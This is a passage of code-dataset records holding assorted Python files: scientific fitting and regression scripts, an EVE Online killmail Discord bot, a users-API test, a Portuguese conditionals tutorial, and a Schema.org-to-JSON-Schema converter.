T_year_cum[i-1])/2\n M[i, 2] = (T_year_cum[i]**3 - T_year_cum[i-1]**3)/6 / (T_year.squeeze()[i]+np.spacing(1)) #eps was outside in matlab\nB_t2pM = B_t2p @ M\nBM = np.hstack((h2p, B_t2pM))\nB_t_seM = B_t_se @ M\nB_t2p_seM = B_t2p_se @ M\nB_seM = np.hstack((h2p_se, B_t2p_seM))\n\n\n## parameters for subset detection\narc_threshold = 3 # 2.5, 1.5\n# CoreNum = 6 # feature('numcores')\nnum_threshold = 50\npatch_num_2 = 3 # (2 ^ 3) * (2 ^ 3) = 8 * 8 = 64\npatch_num_x = 3 # 32\npatch_num_y = 3 # 32\n\n## unique arc flag\nunique_arc_flag = 'par' # 'par' or 'obs'\nmerge_par_threshold = 3\nmerge_obs_threshold = 0.7\npatch_min_arcs = 50\nn_point_search = 50\nmin_win_ksize = 3 # unit: 2 km\nhight_diff_threshold = 1000 # unit m\n\n## save parameters\nInput = {}\nInput['baseline'] = Bp\nInput['interval'] = input_t_interval\nInput['pair_index'] = input_pair_index\nInput['se_pair_index'] = se_pair_index\nInput['tmatrix'] = input_matrix_t\nInput['wavelen'] = wavelen\nInput['slantran'] = slantran\nInput['incangle'] = incangle\nInput['date'] = SCE\nInput['sb'] = shortbaseline\nInput['NTCP'] = obs.shape[0]\nInput['maxheight'] = max(obs[:, 4])\nInput['minheight'] = min(obs[:, 4])\nInput['num'] = num\nInput['NIFG'] = NIFG\nInput['NSLC'] = NSLC\nInput['Nintv'] = Ninterval\nInput['h2p'] = h2p\nInput['h2p_se'] = h2p_se\nInput['T_year'] = T_year\nInput['T_year_matrix'] = T_year_matrix\nInput['B_t'] = B_t\nInput['B_t_sum'] = B_t_sum\nInput['B_t2p_sum'] = B_t2p_sum\nInput['B_t2p'] = B_t2p\nInput['B_vi'] = B_vi\nInput['B_v'] = B_v\nInput['B_di'] = B_di\nInput['B_t2p_di'] = B_t2p_di\nInput['co_index'] = co_index\nInput['inv2inv_matrix'] = inv2inv_matrix\nInput['B_coseis_t2p_di'] = B_coseis_t2p_di\nInput['B_coseis_di'] = B_coseis_di\nInput['B_t2p_vi_coseis'] = B_t2p_vi_coseis\nInput['B_t2p_se'] = B_t2p_se\nInput['B_t2pM'] = B_t2pM\nInput['BM'] = BM\nInput['B_t_seM'] = B_t_seM\nInput['B_t2p_seM'] = B_t2p_seM\nInput['B_seM'] = B_seM\nInput['B_t2p_se_sum'] = B_t2p_se_sum\nInput['B_v_se'] = B_v_se\nInput['B_vi_se'] = B_vi_se\n# Input['CoreNum'] = CoreNum #CoreNum removed as multi core is replaced with multi-processing\nInput['spa_r'] = spa_r\nInput['spa_azi'] = spa_azi\nInput['width'] = width\nInput['lines'] = lines\nInput['interval_r'] = interval_r\nInput['interval_azi'] = interval_azi\nInput['radius'] = radius\nInput['ref_point'] = ref_point\nInput['ref_slc'] = ref_slc\nInput['num_threshold'] = num_threshold\nInput['patch_num_2'] = patch_num_2\nInput['patch_num_x'] = patch_num_x\nInput['patch_num_y'] = patch_num_y\nInput['arc_threshold'] = arc_threshold\nInput['unique_arc_flag'] = unique_arc_flag\nInput['merge_par_threshold'] = merge_par_threshold\nInput['merge_obs_threshold'] = merge_obs_threshold\nInput['patch_min_arcs'] = patch_min_arcs\nInput['n_point_search'] = n_point_search\nInput['minw_ksize'] = min_win_ksize\nInput['hdiff_T'] = hight_diff_threshold\n\n # return Input\n","sub_path":"test_run/jointmodel_data/parpre_step.py","file_name":"parpre_step.py","file_ext":"py","file_size_in_byte":11174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645110227","text":"from firetail.lib import db\nfrom firetail.utils import make_embed\nimport asyncio\n\n\nclass Killmails:\n def __init__(self, bot):\n self.bot = bot\n self.session = bot.session\n self.config = bot.config\n self.logger = bot.logger\n self.loop = asyncio.get_event_loop()\n self.loop.create_task(self.tick_loop())\n\n async def tick_loop(self):\n await self.bot.wait_until_ready()\n while not self.bot.is_closed():\n try:\n data = await self.request_data()\n if data['killID']:\n await self.process_data(data)\n else:\n await asyncio.sleep(15)\n await asyncio.sleep(1)\n except:\n await asyncio.sleep(5)\n\n async def process_data(self, kill_data):\n config = self.config\n km_groups = config.killmail['killmailGroups']\n big_kills = config.killmail['bigKills']\n big_kills_value = config.killmail['bigKillsValue']\n # Foreach thru all provided groups\n for group in km_groups:\n killmail_group_id = int(config.killmail['killmailGroups'][group]['id'])\n channel_id = config.killmail['killmailGroups'][group]['channelId']\n loss = config.killmail['killmailGroups'][group]['lossMails']\n # Skip npc\n if kill_data['zkb']['npc'] or not kill_data['killmail']['victim']['corporation_id']:\n break\n # Get all group id's from the mail\n group_ids = []\n if loss:\n group_ids.append(int(kill_data['killmail']['victim']['corporation_id']))\n if 'alliance_id' in kill_data['killmail']['victim']:\n group_ids.append(int(kill_data['killmail']['victim']['alliance_id']))\n for attacker in kill_data['killmail']['attackers']:\n if 'corporation_id' in attacker:\n group_ids.append(int(attacker['corporation_id']))\n if 'alliance_id' in attacker:\n group_ids.append(int(attacker['alliance_id']))\n if killmail_group_id in group_ids:\n await self.process_kill(channel_id, kill_data)\n for ext in self.bot.extensions:\n if 'add_kills' in ext:\n sql = \"SELECT * FROM zkill\"\n other_channels = await db.select(sql)\n for zkill in other_channels:\n print(zkill[3])\n print(group_ids)\n if zkill[3] in group_ids:\n await self.process_kill(zkill[1], kill_data)\n if kill_data['zkb']['totalValue'] >= big_kills_value and big_kills:\n channel_id = config.killmail['bigKillsChannel']\n await self.process_kill(channel_id, kill_data, True)\n\n async def process_kill(self, channel_id, kill_data, big=False):\n bot = self.bot\n kill_id = kill_data['killID']\n kill_time = kill_data['killmail']['killmail_time'].split('T', 1)[1][:-4]\n value_raw = kill_data['zkb']['totalValue']\n value = '{0:,.2f}'.format(float(value_raw))\n try:\n victim_id = kill_data['killmail']['victim']['character_id']\n victim_name = await self.bot.esi_data.character_name(victim_id)\n except:\n victim_name = None\n ship_lost_id = kill_data['killmail']['victim']['ship_type_id']\n ship_lost_raw = await self.bot.esi_data.type_info_search(ship_lost_id)\n ship_lost = ship_lost_raw['name']\n victim_corp_id = kill_data['killmail']['victim']['corporation_id']\n victim_corp_raw = await self.bot.esi_data.corporation_info(victim_corp_id)\n victim_corp = victim_corp_raw['name']\n try:\n victim_alliance_id = kill_data['killmail']['victim']['alliance_id']\n victim_alliance_raw = await self.bot.esi_data.alliance_info(victim_alliance_id)\n victim_alliance = victim_alliance_raw['name']\n except:\n victim_alliance = None\n solar_system_id = kill_data['killmail']['solar_system_id']\n solar_system_info = await self.bot.esi_data.system_info(solar_system_id)\n solar_system_name = solar_system_info['name']\n if '-' in solar_system_name:\n solar_system_name = solar_system_name.upper()\n title = ship_lost + \" Destroyed in \"\n if big:\n title = \"BIG KILL REPORTED: \" + ship_lost + \" Destroyed in \"\n em = make_embed(msg_type='info', title=title.title() + str(solar_system_name),\n title_url=\"https://zkillboard.com/kill/\" + str(kill_id) + \"/\",\n content='Killed At: ' + kill_time + ' EVE')\n em.set_footer(icon_url=self.bot.user.avatar_url,\n text=\"Provided Via firetail Bot + ZKill\")\n em.set_thumbnail(url=\"https://image.eveonline.com/Type/\" + str(ship_lost_id) + \"_64.png\")\n if victim_name is not None and victim_alliance is not None:\n em.add_field(name=\"Victim\",\n value=\"Name: \" + str(victim_name) + \"\\nShip Value: \" + value + \" \\nCorp: \" + str(victim_corp) +\n \" \\nAlliance: \" + str(victim_alliance) + \" \\n \")\n elif victim_name is not None and victim_alliance is None:\n em.add_field(name=\"Victim\",\n value=\"Name: \" + str(victim_name) + \"\\nShip Value: \" + value + \" \\nCorp: \" + str(victim_corp))\n elif victim_name is None and victim_alliance is not None:\n em.add_field(name=\"Structure Info\",\n value=\"Structure Value: \" + value + \"\\nCorp: \" + str(victim_corp) + \" \\nAlliance: \" +\n str(victim_alliance) + \" \\n \")\n elif victim_name is None and victim_alliance is None:\n em.add_field(name=\"Structure Info\",\n value=\"Structure Value: \" + value + \"\\nCorp: \" + str(victim_corp))\n try:\n channel = bot.get_channel(int(channel_id))\n except:\n return self.logger.info('Killmail - Bad Channel Attempted {}'.format(channel_id))\n self.logger.info(('Killmail - Kill # {} has been posted to {}'\n '').format(kill_id, channel.name))\n await channel.send(embed=em)\n\n async def request_data(self):\n base_url = \"https://redisq.zkillboard.com\"\n zkill = \"{}/listen.php?queueID={}\".format(base_url, self.bot.user.id)\n async with self.bot.session.get(zkill) as resp:\n data = (await resp.json())['package']\n try:\n if data.get('killID'):\n return data\n except:\n return None\n","sub_path":"firetail/extensions/killmails/killmails.py","file_name":"killmails.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"335388168","text":"import random\nimport requests\nimport string\n\nfrom utility import Utility\n\nutil = Utility()\n\n\nclass TestUsersApi(object):\n\n def test_create_user(self):\n username = \"\".join(\n random.choice(string.ascii_lowercase) for _ in range(8))\n user = {\n \"username\": username,\n \"password\": username,\n \"displayName\": username,\n \"lastName\": \"\",\n \"email\": username + \"@example.com\",\n \"role\": \"USER\"\n }\n post = requests.post(util.apiurl() + \"/users\", json=user,\n headers=util.headers())\n assert post.status_code == 201, \"Status code of POST on /users endpoint was not 201\"\n res = post.json()\n assert res[\"username\"] == user[\n \"username\"], \"Incorrect username of created user\"\n assert res[\"displayName\"] == user[\n \"displayName\"], \"Incorrect displayName of created user\"\n assert res[\"lastName\"] == user[\n \"lastName\"], \"Incorrect lastName of created user\"\n assert res[\"email\"] == user[\"email\"], \"Incorrect email of created user\"\n assert res[\"role\"] == user[\"role\"], \"Incorrect role of created user\"\n","sub_path":"pytest/test_users_api.py","file_name":"test_users_api.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260525169","text":"from GP_REBOOT import GPR_reboot\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\ndef f1(x):\n return np.sin(x.T)\n#%% IMPOSTAZIONE PROBLEMA\n\n#f = lambda x: np.cos(.7*x).flatten()\n\nN = 50 # numero punti training\nn = 1000 # numero punti test\ns = 0.1 # noise variance\n\nrng = np.random.RandomState(2)\nx = np.squeeze(rng.uniform(-5, 5, size = (N,1)))\nx_guess = np.linspace(-5, 5, n)\ny = f1(x) + s*np.random.randn(N)\n#%%\n# PLOT MISURE\nplt.figure()\nplt.title(\"Misure\")\nax = plt.gca()\ncosine, = ax.plot(x_guess, f1(x_guess))\nmeasures = plt.scatter(x,y, c = \"black\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.legend([cosine, measures], [\"f(x)\", \"punti training\"])\nplt.savefig('misure.png', bbox_inches='tight')\n\n#%%\ngaus = GPR_reboot(x,y,\n x_guess,\n kernel=GPR_reboot.gaussian_kernel,\n kernel_params = {'const': 10,\n 'length': 5},\n R =s)\n#%%\n#predictor\npreds = gaus.predict()\n\n\ngaus.plot(axlabels = [\"x\", \"y\"],title = 'pred1', save = \"test_figure\")\n\npreds2 = gaus.predict2()\n\ngaus.plot(axlabels = [\"x\", \"y\"],title = 'pred2', save = \"test_figure\")\n\n#%%\n\n#%%\noptimizer_params = {'const': np.log(1),\n 'length': np.log(10)}\n\nmin_results = gaus.optimizer(mode='CG',param_x0 = optimizer_params)\n#%%\n\nmin_results = gaus.optimizer(mode='Newton-CG',param_x0 = optimizer_params)\n#%%\noptimized_params, logp = gaus.optimizer(mode='Nelder-Mead',param_x0 = optimizer_params)\n\n#%%\noptimizer_ranges = {'const': (0,10),\n 'length': (0,10)}\n#\noptimized_params, logp, grid, grid_values = gaus.optimizer(ranges_dict = optimizer_ranges,\n mode = \"brute\",\n Ns = 500,\n output_grid = True)\n\n#%%\ngaus.update_params(optimized_params)\npreds2 = gaus.predict()\ngaus.plot(title = \"after optim\",axlabels = [\"x\", \"y\"], save = \"optim\")\n\n","sub_path":"GPR_REBOOT/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608017616","text":"# As condicionais é dar a capacidade de decisão ao programa. As condicionais são 'if', 'else' e 'elif'. Essas\r\n# condicionais trabalham em cima de Verdadeiro (True) ou Falso (False). No exemplo abaixo a idade é igual a 17, mas\r\n# a condicional é que: se for maior ou igual a 18, deve-se retornar a mensagem teste. Como 17 não é maior ou igual a 18\r\n# o programa não retorna erro ou mensagem.\r\nidade = 17\r\nif idade >= 18:\r\n print ('teste')\r\n\r\n# Já no caso abaixo a idade é igual a 18, logo retornará a mensagem 'teste'.\r\nidade = 18\r\nif idade >= 18:\r\n print('teste')\r\n\r\n# Também pode-se usar o símbolo de menor para realizar as comparações dentro do programa. Caso a variável tenha que ter\r\n# o valor exatamente igual ao que se procura, deve-se usar '=='. Um igual só é atribuição de valor a variável.\r\nidade = int(input('Digite sua idade: '))\r\nif idade == 18:\r\n# Aqui vemos uma indetação, pois está na mesma linha que a primeira decisão ou dentro do 'if'.\r\n print('A idade é igual a 18!')\r\n# print ('dentro do if')\r\n\r\n# Uma das coisas que podem ser acrescentadas entre um 'if' e um 'else' é um 'elif'. É como se fosse para ter uma nova\r\n# condição antes da decisão final do programa. O 'elif' significa 'senão se'.\r\nelif idade == 17:\r\n print ('A idade é igual a 17!')\r\n\r\n# Já aqui está fora da indentação ou fora do 'if' e por isso ele imprime a linha abaixo de qualquer maneira\r\n#print ('fora do if')\r\n# O 'if' pode trabalhar sozinho na qu17estão acima, porém caso seja declarada uma idade diferente o programa tem que tomar\r\n# uma decisão, então será usado um 'else'. O 'else' deve vir em seguida (na mesma linha) do 'if'\r\nelse:\r\n print ('A idade não é 17 e nem 18!')\r\n\r\n# Uma outra forma de verificar o valor de algo é diferente dentro dos operadores é usando '!=' que significa\r\n# \"não é igual a...\". Com esse operador o if continua procurando algo que seja exatamente igual ao valor atribuído.\r\n# Se digitar no IDLE: idade = 17 e depois digitar idade != 18 o IDLE do python retornará True, por que está realmente\r\n# afirmando que 17 é diferente de 18.\r\nidade = int(input('Digite sua idade: '))\r\nif idade != 18:\r\n print ('A idade não é igual a 18!')\r\n\r\n# No python qualquer valor tem atrelado a ele Verdadeiro ou Falso, por exemplo:\r\ny = 5\r\nif y:\r\n print ('teste')\r\n\r\n# Lembre-se que o python considera qualquer valor vazio ou 0 igual a falso. Abaixo pode ver que o y = 0 o que\r\n# vai acontecer é que a linha de print não será executada por que ela é falsa. Se o valor for diferente de zero\r\n# o python considera verdadeiro. Segue exemplo:\r\ny = 0\r\nif y:\r\n print ('teste')\r\n\r\n# Pode-se terstar se alguma lista ou dicionário tem valor ou não, por exemplo se abre uma lista mas não se coloca\r\n# valores:\r\nlista1 = []\r\nif lista1:\r\n print ('Lista tem valores')\r\n\r\n# OBS: No IDLE pode usar o 'else' porque só pode executar um comando por vez.\r\n# Se colocar algum valor na lista ou no Dic. o comando acima imprimirá a mensagem. Segue exemplo:\r\nlista1.append ('joao')\r\nprint (lista1)\r\nif lista1:\r\n print ('Lista tem valores')\r\n","sub_path":"Curso do Ivan Gomes/Básico/condicionais.py","file_name":"condicionais.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169291827","text":"from pyclustering.cluster.center_initializer import random_center_initializer as rci\nfrom pyclustering.cluster.kmedians import kmedians\nfrom pyclustering.utils.metric import distance_metric\n\ndef kmediansRun(sample, k, specMetric):\n initial_medians = rci(sample, k).initialize()\n kmedians_instance = kmedians(sample, initial_medians, metric = distance_metric(specMetric))\n\t\n kmedians_instance.process()\n clusters = kmedians_instance.get_clusters()\n predicted = kmedians_instance.predict(sample)\n return (clusters, predicted)","sub_path":"MasterDegree/kmediansRun.py","file_name":"kmediansRun.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"557354185","text":"\"\"\"Стандартная сортировка\"\"\"\n\nimport timeit\nimport random\n\n\"\"\"\nВнутри Python использует Timsort – гибридный алгоритм сортировки, \nсочетающий сортировку вставками и сортировку слиянием. \nСмысл в том, что в реальном мире часто встречаются частично \nотсортированные данные, на которых Timsort работает ощутимо \nбыстрее прочих алгоритмов сортировки. Сложность по времени: \nO(n log n) в худшем случае и O(n) – в лучшем.\n\n\nlist.sort() - Сортирует лист, но возвращает None\nsorted(list) - Сортирует лист и возвращает его\n\"\"\"\n\n\ndef reverse_sort(lst_obj):\n ordered_list = sorted(lst_obj)\n return ordered_list\n\n\norig_list = [random.randint(-100, 100) for _ in range(10)]\n\n# замеры 10\nprint(\n timeit.timeit(\n \"reverse_sort(orig_list[:])\",\n globals=globals(),\n number=1000))\n\norig_list = [random.randint(-100, 100) for _ in range(100)]\n\n# замеры 100\nprint(\n timeit.timeit(\n \"reverse_sort(orig_list[:])\",\n globals=globals(),\n number=1000))\n\norig_list = [random.randint(-100, 100) for _ in range(1000)]\n\n# замеры 1000\nprint(\n timeit.timeit(\n \"reverse_sort(orig_list[:])\",\n globals=globals(),\n number=1000))\n\n\"\"\"\n0.0007880000000000109\n0.005651299999999998\n0.10248260000000001\n\"\"\"\n","sub_path":"Урок 7. Практическое задание/Урок 7. Коды примеров/Стандартная сортировка 1.py","file_name":"Стандартная сортировка 1.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587020392","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom sklearn.preprocessing import RobustScaler, StandardScaler\n\n\ndef data_prepare(df, cls_id_selected=12, yr_crit=2019):\n \"\"\"\n 讀取資料,依據資料欄位篩選變量\n 取cluster_id list成{},取出想要預測的cluster_id\n 不取第一欄的clister_id>>>[1:]\n 把x變量跟y變量的資料取出\n 針對x變量標準化後取出\n \"\"\"\n # ##########################\n # Split data into clusters #\n # ##########################\n #df = df.rename(columns={'count':'cnt'})\n #df.groupby('Cluster_id').count().sort_values('Year',ascending=False)\n\n # check a cluster peak by index\n cls_ids = df[\"Cluster_id\"].unique()\n\n cluster = {}\n for cls_id in cls_ids:\n cluster[cls_id] = df[df['Cluster_id']==cls_id].iloc[:,1:]\n\n assert len(cluster.keys()) == len(cls_ids)\n\n train = cluster[cls_id_selected][cluster[cls_id_selected]['Year'] < yr_crit]\n test = cluster[cls_id_selected][cluster[cls_id_selected]['Year'] == yr_crit]\n print(\"INFO: TRAIN/TEST shape BEFORE scaling:\", train.shape, test.shape)\n\n # #######################################\n # Fetch the train & test column indices #\n # #######################################\n cols = list(df.columns)[1:]\n x_col_ids = []\n for idx, b in zip(np.arange(100), np.array(cols) != \"Pickup_count\"):\n # print(idx, b)\n if b == True:\n x_col_ids.append(idx)\n\n y_col_id = np.argmax(np.array(cols) == \"Pickup_count\")\n\n # #############\n # X & y split #\n # #############\n train_x = train.values[:, x_col_ids]\n train_y = train.values[:, y_col_id]\n\n test_x = test.values[:, x_col_ids]\n test_y = test.values[:, y_col_id]\n\n # ######################\n # Data Standarlization #\n # ######################\n scaler = StandardScaler()\n # scaler = RobustScaler()\n scaler = scaler.fit(train_x)\n\n train_x_scaled = scaler.transform(train_x)\n test_x_scaled = scaler.transform(test_x)\n print(\"INFO: shape of scaled TRAIN_X and TEST_X:\", train_x_scaled.shape, test_x_scaled.shape)\n\n print(\"INFO: shape of TRAIN_Y and TEST_Y:\", train_y.shape, test_y.shape)\n\n assert len(train_y) == len(train_x_scaled) == len(train_x)\n assert len(test_y) == len(test_x_scaled) == len(test_x)\n\n return train_x_scaled, train_y, test_x_scaled, test_y\n\n\ndef time_window_strided_sampling(X,y, time_steps=1):\n \"\"\"\n 這裡是要把過去的資料加到現在的資料中當作變量\n 時間步數是根據自設的參數調整有所差別 以1的表現比較好\n \"\"\"\n Xs, ys = [], []\n for i in range(len(X) - time_steps):\n v = X[i:(i + time_steps)]\n Xs.append(v)\n ys.append(y[i + time_steps])\n return np.array(Xs), np.array(ys)","sub_path":"machineLearn/LSTM/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621193043","text":"import numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\n\n\nclass RotatingVectorModel(object):\n\n '''Fits a RVM (RC69) to PA via least squares.'''\n\n def __init__(self, phase, pa, paerr):\n self.phase = phase\n self.pa = pa\n self.paerr = paerr\n\n def model(self, parameters):\n '''The rotating vector model. Everett and Weisberg 2000.'''\n alpha, beta, phi0, psi0 = parameters\n zeta = alpha + beta\n numerator = (np.sin(alpha) * np.sin(self.phase - phi0))\n denominator = (np.sin(zeta) * np.cos(alpha) - np.cos(zeta) * np.sin(alpha) * np.cos(self.phase-phi0))\n for d in range(len(denominator)):\n if denominator[d] == 0:\n denominator[d] += 0.0001 # ERROR FUDGE\n model = psi0 + np.arctan(numerator/denominator)\n return model\n\n def cf_model(self, phase, alpha, beta, phi0, psi0):\n '''The rotating vector model.'''\n zeta = alpha + beta\n model = (psi0 + np.arctan((np.sin(alpha) *\n np.sin(phase - phi0)) /\n (np.sin(zeta) * np.cos(alpha) -\n np.cos(zeta) * np.sin(alpha) *\n np.cos(phase-phi0))))\n return model\n\n def fit_RVM(self, init_params):\n '''Fit RVM to PA curve.'''\n best_fit = self._least_squares(init_params)\n print('best fit = {} degrees'.format(best_fit*180/np.pi))\n return best_fit\n\n def _least_squares(self, init_params):\n '''Least squares fit of model to data.'''\n b = ([0, -np.pi/2, -np.inf, -np.inf],\n [np.pi, np.pi/2, np.inf, np.inf])\n # b = [(0, np.pi), (-np.pi/2, np.pi/2), (-np.inf, np.inf), (-np.inf, np.inf)]\n model = lambda x: self._residuals(x)\n lsq = opt.least_squares(model, init_params, bounds=b)\n return lsq.x\n\n def _residuals(self, parameters):\n '''Difference between the model and the data.'''\n return (self.model(parameters) - self.pa)/self.paerr # DOESN'T WORK IF SQUARED, PROB BC USING LEAST_SQUARES FN NOT MINIMISE\n \n def fit_psi0(self, init_params):\n # TO DOCUMENT\n alpha, beta, phi0, psi0_init = init_params\n best_fit_psi0 = self.lsq_psi0(init_params)\n best_fit = [alpha, beta, phi0, best_fit_psi0]\n return best_fit\n\n def fit_xy(self, init_params):\n # TO DOCUMENT\n alpha, beta, phi0_init, psi0_init = init_params\n best_fit_xy = self.lsq_xy(init_params)\n best_fit = [alpha, beta, best_fit_xy[0], best_fit_xy[1]]\n return best_fit\n\n def lsq_psi0(self, init_params):\n # TO DOCUMENT\n (alpha, beta, phi0, psi0) = init_params\n lsq = opt.least_squares(self.psi0_residuals, psi0, args=(alpha, beta, phi0))\n return lsq.x[0]\n\n def lsq_xy(self, init_params):\n # TO DOCUMENT\n (alpha, beta, phi0, psi0) = init_params\n varying_params = [phi0, psi0]\n lsq = opt.least_squares(self.xy_residuals, varying_params, args=(alpha, beta))\n return lsq.x\n\n def model_single_phase_value(self, parameters, phase_value):\n '''The rotating vector model.'''\n alpha, beta, phi0, psi0 = parameters\n zeta = alpha + beta\n model = (psi0 + np.arctan((np.sin(alpha) *\n np.sin(phase_value - phi0)) /\n (np.sin(zeta) * np.cos(alpha) -\n np.cos(zeta) * np.sin(alpha) *\n np.cos(phase_value-phi0))))\n return model\n \n def psi0_residuals(self, psi0, alpha, beta, phi0):\n # TO DOCUMENT\n parameters = [alpha, beta, phi0, psi0]\n mindiff = []\n for i in range(len(self.pa)):\n mindiff.append((np.divide(min(np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]))),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + 3*np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - 3*np.pi/2)))[0],\n self.paerr[i])))\n return mindiff\n\n def xy_residuals(self, xyparams, alpha, beta):\n # TO DOCUMENT\n phi0, psi0 = xyparams\n parameters = [alpha, beta, phi0, psi0]\n mindiff = []\n for i in range(len(self.pa)):\n mindiff.append((np.divide(min(np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]))),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + 3*np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - 3*np.pi/2))),\n self.paerr[i])))\n return mindiff\n \n def model_in_2pi_window(self, model):\n '''Put model into region between +pi and -pi.'''\n for i in range(len(model)):\n if model[i] < -np.pi/2:\n while True:\n model[i] += np.pi\n if model[i] >= -np.pi/2:\n break\n elif model[i] > np.pi/2:\n while True:\n model[i] -= np.pi\n if model[i] <= np.pi/2:\n break\n return model\n \n def compare_data_model(self, fitparams):\n '''Separate data into the two modes and identify jump positions.'''\n # Boolean array to separate data points into one mode or the other.\n model = self.model_in_2pi_window(self.model(fitparams))\n model90shift = self.model_in_2pi_window(model-np.pi/2)\n modesplit = []\n for i in range(len(self.pa)):\n dmdiff = np.abs(self.pa[i] - model[i])\n if np.pi/4 < dmdiff < 3*np.pi/4:\n modesplit.append(False)\n else:\n modesplit.append(True)\n # List of phase bin positions where jumps happen.\n jumplist = [0]\n for m in range(len(modesplit) - 1):\n if modesplit[m] is True and modesplit[m+1] is False:\n jumplist.append(m+1)\n elif modesplit[m] is False and modesplit[m+1] is True:\n jumplist.append(m+1)\n # Need end as well, got to deal with the trimming...\n return model, model90shift, modesplit, jumplist\n","sub_path":"RVM.py","file_name":"RVM.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235715495","text":"import pprint\nimport json\n\nclass SchemaOrgToJsonSchema(object):\n\t\"\"\"docstring for SchemaOrgToJsonSchema\"\"\"\n\tdef __init__(self, args=[], kwargs={}):\n\t\tsuper(SchemaOrgToJsonSchema, self).__init__()\n\t\tself.args = args\n\t\tself.tocamelCase = lambda s: s[:1].lower() + s[1:] if s else ''\n\t\tself.schema_rdfs_json = eval(open(kwargs.get(\"schema_rdfs_json_file\")).read(),\\\n\t\t\t\t\t\t\t\t\t {\"null\": None, \"true\": True, \"false\": False})\n\n\t\tself.json_schema = {}\n\n\tdef get_field(self, schema_dict, superclass):\n\t\tif not schema_dict.get(\"schema:supersededBy\"):\n\t\t\tfield = {\n\t\t\t\t\t\t# \"name\": self.tocamelCase(superclass[\"@id\"].replace(\"schema:\", \"\")),\n\t\t\t\t\t\t\"name\": superclass[\"@id\"].replace(\"schema:\", \"\"),\n\t\t\t\t\t\t# \"label\": superclass.get(\"rdfs:label\", \"\"),\n\t\t\t\t\t\t\"comment\": superclass.get(\"rdfs:comment\", \"\")\t\t\t\t\t\n\t\t\t\t\t}\n\n\t\t\tranges = schema_dict.get(\"schema:rangeIncludes\")\n\t\t\tif ranges:\n\t\t\t\tif type(ranges) == type([]):\n\t\t\t\t\tfield[\"types\"] = [srange[\"@id\"].replace(\"schema:\", \"\") for srange in ranges]\t\n\t\t\t\telse:\n\t\t\t\t\tfield[\"types\"] = [ranges[\"@id\"].replace(\"schema:\", \"\")]\n\t\t\treturn field\n\t\treturn {}\n\n\tdef get_fields(self, schema_dict, superclasses):\n\t\tfields = []\n\t\tif type(superclasses) == type([]):\t\t\t\t\t\t\n\t\t\tfor superclass in superclasses:\n\t\t\t\tfield = self.get_field(schema_dict, superclass)\n\t\t\t\tif field:\n\t\t\t\t\tfields.append(field)\n\t\telse:\n\t\t\tfield = self.get_field(schema_dict, superclasses)\n\t\t\tif field:\n\t\t\t\tfields.append(field)\n\t\treturn fields\n\n\tdef add_fields(self, schema_id, sfields, fields):\n\t\tif sfields:\n\t\t\tself.json_schema[schema_id][\"fields\"].extend(fields)\n\t\telse:\n\t\t\tself.json_schema[schema_id][\"fields\"] = fields[:]\n\n\tdef set_schema(self, schema_id):\n\t\tif not self.json_schema.get(schema_id):\n\t\t\tself.json_schema[schema_id] = {}\n\n\tdef add_enum(self, schema_id, enum_val):\n\t\tenum_list = self.json_schema[schema_id].get(\"enum\")\n\t\tif enum_list:\n\t\t\tself.json_schema[schema_id][\"enum\"].append(enum_val)\n\t\telse:\n\t\t\tself.json_schema[schema_id][\"enum\"] = [enum_val]\n\n\tdef generate_from_type(self, schema_dict, stype):\n\t\tif stype == \"rdfs:Class\":\n\t\t\tschema_id = schema_dict[\"@id\"].replace(\"schema:\", \"\")\n\t\t\tself.set_schema(schema_id)\n\t\t\tself.json_schema[schema_id][\"comment\"] = schema_dict[\"rdfs:comment\"]\n\t\t\t# self.json_schema[schema_id][\"label\"] = schema_dict[\"rdfs:label\"]\n\n\t\t\tsuperclasses = schema_dict.get(\"rdfs:subClassOf\")\n\t\t\tif superclasses:\t\t\t\t\n\t\t\t\tfields = self.get_fields(schema_dict, superclasses)\n\t\t\t\tsfields = 